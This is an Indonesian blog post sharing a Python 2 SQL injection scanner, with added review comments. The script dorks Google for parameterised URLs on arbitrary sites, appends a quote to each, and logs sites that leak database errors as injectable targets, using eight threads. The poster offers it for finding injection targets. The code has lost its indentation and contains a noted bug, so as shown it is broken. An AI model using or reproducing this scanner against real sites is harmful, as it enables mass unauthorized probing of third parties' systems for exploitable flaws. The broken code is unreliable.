Sql scanner .... (.py)

kemarin-kemarin kerjaanx gw cuma nyari2 tools ... yah maklumlah masih kiddie ...hehehe ...
sambil perlahan-lahan pelajari tuh script2 python yg lumayan bikin pusing, ngak pa2 pelan tapi pasti, situs darkc0de salah satu yg ngasih kita banyak tools scanner yg bisa di manfaatkan, tp sayang nich situs udah jadi komersil, script nich lumayan bagus buat nyari2 target sql injection ...

#!/usr/bin/python
# http://thepurgatory.com __
# ___ __ _________ ____ _/ /____ ______ __
# / _ \/ // / __/ _ `/ _ `/ __/ _ \/ __/ // /
# / .__/\_,_/_/ \_, /\_,_/\__/\___/_/ \_, /
# /_/ /___/ /___/
# ___________ _ __
# SQLi Scanner by rCom / __/ __/ -_) |/|/ /
# root.localhost@live.com \__/_/ \__/|__,__/
#
#####################################################

import string, sys, time, urllib2, cookielib, re, random, threading, socket, os
from random import choice
from optparse import OptionParser
# Clear the terminal before any output ('cls' on Windows, 'clear' elsewhere).
os.system('cls' if os.name == 'nt' else 'clear')

# Worker threads started by the script body are collected here.
threads = []
numthreads = 8

# Process-wide default socket timeout, in seconds, for sockets created later.
timeout = 4
socket.setdefaulttimeout(timeout)

# Version string and a date-like tag; neither is read in the visible code.
version = '0.1a'
ldm = 'jun_22_09'

# Not referenced anywhere in the visible part of the file.
rSA = list(range(2, 7))

# Custom-search engine ids keyed by the names the -e option advertises.
# No visible line looks a value up from this table.
CXdic = {
    'blackle': '013269018370076798483:gg7jrrhpsy4',
    'ssearch': '008548304570556886379:0vtwavbfaqe',
    'redfront': '017478300291956931546:v0vo-1jh2y4',
}

# Label -> substring of a verbose database/driver error message.
# ClassicINJ reports a URL when any of these substrings appears in the
# response body. Read from the defending side, this is a list of messages an
# application should never return to a client.
SQLeD = {
    'MySQL(Syntax)': 'error in your SQL syntax',
    'MySQL(fetch_array)': 'mysql_fetch_array',
    'MySQL(fetch_assoc)': 'mysql_fetch_assoc',
    'MySQL(num_rows)': 'mysql_num_rows',
    'MSSQL_OLEdb': 'Microsoft OLE DB Provider',
    'MSSQL_Uqm': 'Unclosed quotation mark',
    'MS-Access_ODBC': 'ODBC Microsoft Access Driver',
}

# Values accepted for the -f option; anything else falls back to php.
filetypes = [
    'php',
    'php2',
    'asp',
    'aspx',
    'jsp',
    'htm',
    'html',
]

# User-Agent strings; searchIt picks one at random for each search request.
header = [
    'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
    'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
    'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
    'Microsoft Internet Explorer/4.0b1 (Windows 95)',
    'Opera/8.00 (Windows NT 5.1; U; en)',
]

# Value sent as the num= parameter of the search URL (results per page).
gnum = 100

# searchIt: page through a Google custom-search URL and return candidate
# URLs, at most one per host, that contain a "=".
#
# go_dork and go_ftype are joined with "+" into the q= parameter, go_search is
# placed in the query string as-is, and maxc (converted with int()) bounds the
# start= offset. None of the pieces is URL-encoded before concatenation.
#
# NOTE(review): this paste lost its indentation, so the exact nesting of the
# loops below cannot be confirmed from the page; the code is left untouched.
def searchIt(go_dork,go_search,go_ftype,maxc):
uRLS = []
counter = 0
while counter < int(maxc):
# A FileCookieJar on the file name "cookies" is attached to the opener.
jar = cookielib.FileCookieJar("cookies")
query = 'q='+go_dork+'+'+go_ftype
results_web = 'http://www.google.com/cse?'+go_search+'&'+query+'&num='+str(gnum)+'&hl=en&lr=&ie=UTF-8&start=' + repr(counter) + '&sa=N'
request_web = urllib2.Request(results_web)
# The search request carries a User-Agent chosen at random from `header`.
agent = random.choice(header)
request_web.add_header('User-Agent', agent)
opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
text = opener_web.open(request_web).read()
# Capture whatever sits between href=" and the next double quote.
strreg = re.compile('(?<=href=")(.*?)(?=")')
names = strreg.findall(text)
# Step the offset by 100, the same value gnum requests per page.
counter += 100
for name in names:
if name not in uRLS:
# Dropped: hrefs containing "(" or "<", starting with "/", or starting with
# "http://" followed by a digit.
if re.search(r'\(', name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name):
pass
# Dropped: hrefs containing "google", "youtube" or "%", or matching ".gov".
# The dot is unescaped, so that pattern matches any character before "gov".
elif re.search("google", name) or re.search("youtube", name) or re.search(".gov", name) or re.search("%", name):
pass
else:
uRLS.append(name)
# Second pass: keep the first URL seen for each host, and only URLs that
# contain "=", i.e. that carry a query-string style parameter.
tmpList = []; finalList = []
for entry in uRLS:
try:
# For scheme://host/path the third piece of this split is the host.
t2host = entry.split("/",3)
domain = t2host[2]
if domain not in tmpList and "=" in entry:
finalList.append(entry)
tmpList.append(domain)
# Bare except: an entry with too few "/" pieces (or any other error) is
# skipped without a message.
except:
pass
print "\n[!] - Starting scan please wait...."
return finalList

class injThread(threading.Thread):
    """Worker thread that passes each URL of its batch to ClassicINJ.

    Attributes:
        hosts: the batch of URLs handed to the constructor.
        fcount: incremented each time run() catches a KeyboardInterrupt.
        check: run flag; stop() clears it and run() leaves its loop at the
            start of the next iteration.
    """

    def __init__(self, hosts):
        threading.Thread.__init__(self)
        self.hosts = hosts
        self.fcount = 0
        self.check = True

    def run(self):
        """Walk a copy of the batch until it is exhausted or stop() is called."""
        for target in list(self.hosts):
            try:
                if self.check != True:
                    break
                ClassicINJ(target)
            except KeyboardInterrupt:
                # ClassicINJ wraps its own work in a bare except, so little is
                # expected to propagate up to this handler.
                self.fcount += 1

    def stop(self):
        """Ask run() to finish before it takes the next URL."""
        self.check = False


# ClassicINJ: request `url` with a single quote appended and look for
# database error text in the response body.
#
# What this looks like from the server side: a GET whose URL ends in "'",
# sent through urllib2.urlopen with no headers set by this function. The check
# only fires when the application echoes a driver or database error to the
# client. Parameterized queries remove the cause; generic error pages remove
# the text this check keys on.
#
# NOTE(review): indentation was lost in this paste; the code is left as found.
def ClassicINJ(url):
EXT = "'"
host = url+EXT
try:
source = urllib2.urlopen(host).read()
# `type` shadows the builtin inside this loop. Each eMSG is used as a regular
# expression by re.search, not as a plain substring.
for type,eMSG in SQLeD.items():
if re.search(eMSG, source):
print "\n[!] - Found: ", host
print "[!] - Error: ", type, "\n"
# Matches are appended to vulns.txt, a relative path, so the file lands in
# the current working directory.
savefile = "vulns.txt"
saved = open(savefile, "a")
saved.write(host+'\n')
# File objects have no remove_duplicates method, so this line raises
# AttributeError after the write and before close(); the bare except below
# then prints the "Trying" line for a URL already reported as found.
saved.remove_duplicates()
saved.close()
else:
pass
# Bare except: network errors, timeouts and the AttributeError above all end
# up here and produce the same message.
except:
print "[?] - Trying: ", host
# Script body: parse options, print the banner, collect candidate URLs with
# searchIt, then split them across numthreads injThread workers.
#
# NOTE(review): indentation was lost in this paste, so which statements sit
# inside the `if` and `while` blocks below cannot be confirmed from the page.
parser = OptionParser()
parser.add_option("-d" ,type='string', dest='dork',action='store', help="Dork: dork to search for i.e: index.php?id=")
parser.add_option("-f", type='string', dest='filetype',action='store', default='php', help="Filetype: Type of file i.e php,asp,aspx (def: php)")
parser.add_option("-e", type='string', dest='engine', action='store', default='blackle', help="Search: Engine to use blackle,ssearch,redfront (def: blackle)")
parser.add_option("-m", type='string', dest='maxcount',action='store',default='500', help="Results: Maximum number of results to return (def: 500)")
(options, args) = parser.parse_args()
print "\t\t\t+##################################+"
print "\t\t\t# #"
print "\t\t\t# purgScanner #"
print "\t\t\t# coded by rCom #"
print "\t\t\t# -h for help #"
print "\t\t\t# #"
print "\t\t\t+##################################+"

# go_dork is assigned only when -d was given; the searchIt call further down
# reads it.
if options.dork != None:
print "\n\n[!] | Dork: \t",options.dork.upper()
go_dork = 'inurl:'+options.dork

# A -f value outside `filetypes` falls back to php.
if options.dork != None:
if options.filetype in filetypes:
go_ftype = 'inurl:'+options.filetype
else:
go_ftype = 'inurl:php'

# The engine name is upper-cased and prefixed with 'engine:'; CXdic is not
# consulted here.
go_search = 'engine:'+options.engine.upper()
# Prints the -f value as typed, even when the php fallback above was used.
print "[!] | Type: \t"+options.filetype.upper()
print "[!] | Engine: \t"+options.engine.upper()
print "\n[!] Starting search please wait...."

cuRLS = searchIt(go_dork,go_search,go_ftype,options.maxcount)
# `fin` is never set to False in the visible code.
fin = True
while fin == True:
# i URLs per thread (Python 2 integer division), m left over.
i = len(cuRLS) / int(numthreads)
m = len(cuRLS) % int(numthreads)
z = 0
if len(threads) <= numthreads:
for x in range(0, int(numthreads)):
sliced = cuRLS[x*i:(x+1)*i]
# The first m threads each take one extra URL from the tail of the list.
if (z < m):
sliced.append(cuRLS[int(numthreads)*i+z])
z += 1
thread = injThread(sliced)
thread.start()
threads.append(thread)
# Wait for every worker to finish, then exit the process.
for thread in threads:
thread.join()
sys.exit()
